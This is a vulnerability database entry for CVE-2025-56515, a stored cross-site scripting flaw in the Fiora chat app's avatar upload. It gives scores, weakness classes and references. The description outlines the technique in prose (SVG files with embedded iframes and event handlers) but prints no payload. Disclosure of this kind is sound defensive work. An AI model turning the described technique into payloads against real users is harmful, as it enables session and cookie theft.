CVE-2025-56515HIGH 8.8EPSS p38.4%

CVE-2025-56515CVE-2025-56515

Description

File upload vulnerability in Fiora chat application 1.0.0 through user avatar upload functionality. The application fails to validate SVG file content, allowing malicious SVG files with embedded foreignObject elements containing iframe tags and JavaScript event handlers (onmouseover) to be uploaded and stored. When rendered, these SVG files execute arbitrary JavaScript, enabling attackers to steal user sessions, cookies, and perform unauthorized actions in the context of users viewing affected profiles.

Scoring

CVSS 3.18.8 (HIGH)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS0.49% probability of exploitation · percentile 38.4% · 2026-06-19T12:03:05Z
Published2025-10-01
Last modified2025-10-15

Underlying weaknesses· 2

CWE-79CWE-434

References

  1. https://fiora.suisuijiang.com/
  2. https://github.com/Kov404/CVE-2025-56515/tree/main
  3. https://github.com/yinxin630/fiora

2

TypeTargetConfidenceTier
WeaknessUnrestricted Upload of File with Dangerous Typecwe-4340%live
WeaknessImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')cwe-790%live

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

CVE
CVE-2025-65267
CVE
CVE-2025-55006
CVE
CVE-2026-25558
CVE
CVE-2022-50957
CVE
CVE-2025-67289
CVE
CVE-2025-55454
Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.